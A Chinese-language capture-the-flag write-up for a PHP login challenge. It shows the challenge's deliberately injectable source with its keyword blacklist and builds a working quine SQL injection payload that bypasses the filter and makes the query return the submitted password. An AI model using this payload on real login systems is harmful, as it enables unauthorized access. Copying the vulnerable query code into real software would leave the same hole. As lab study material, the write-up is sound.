查看网页,尝试一下是不是弱口令。发现不是,查看一下源码,发现了一个?source。url访问一下,发现了
源码
<?php
include_once("lib.php");
function alertMes($mes,$url){
die("<script>alert('{$mes}');location.href='{$url}';</script>");
}
function checkSql($s) {
if(preg_match("/regexp|between|in|flag|=|>|<|and|\||right|left|reverse|update|extractvalue|floor|substr|&|;|\\\$|0x|sleep|\ /i",$s)){
alertMes('hacker', 'index.php');
}
}
if (isset($_POST['username']) && $_POST['username'] != '' && isset($_POST['password']) && $_POST['password'] != '') {
$username=$_POST['username'];
$password=$_POST['password'];
if ($username !== 'admin') {
alertMes('only admin can login', 'index.php');
}
checkSql($password);
$sql="SELECT password FROM users WHERE username='admin' and password='$password';";
$user_result=mysqli_query($con,$sql);
$row = mysqli_fetch_array($user_result);
if (!$row) {
alertMes("something wrong",'index.php');
}
if ($row['password'] === $password) {
die($FLAG);
} else {
alertMes("wrong password",'index.php');
}
}
if(isset($_GET['source'])){
show_source(__FILE__);
die;
}
?>
<!-- /?source -->
<html>
<body>
<form action="/index.php" method="post">
<input type="text" name="username" placeholder="账号"><br/>
<input type="password" name="password" placeholder="密码"><br/>
<input type="submit" / value="登录">
</form>
</body>
</html>
分析源码可以知道,username 必须等于admin,密码从row['password'] === $password) 判断。
然后没思路,看了网上佬写的文章,说是quine注入,之前没有了解过
quine
Quine指的是自产生程序,就是输入的sql语句与要输出的一致
Quine注入的目的:输入输出一致 绕过限制登录
https://blog.csdn.net/weixin_53090346/article/details/125531088
查看源码,发现给出了 /?source那么就url访问一下
发现过滤了空格,和其它字符。且username必须等于admin
基本形式为
1'/**/union/**/select/**/replace(replace('r',char(34),char(39)),char(46),'r')#
其中r为
1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#
将基本形式中的r替换成第二段
1'/**/union/**/select/**/replace(replace('1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#',char(34),char(39)),char(46),'1"/**/union/**/select/**/replace(replace(".",char(34),char(39)),char(46),".")#')#
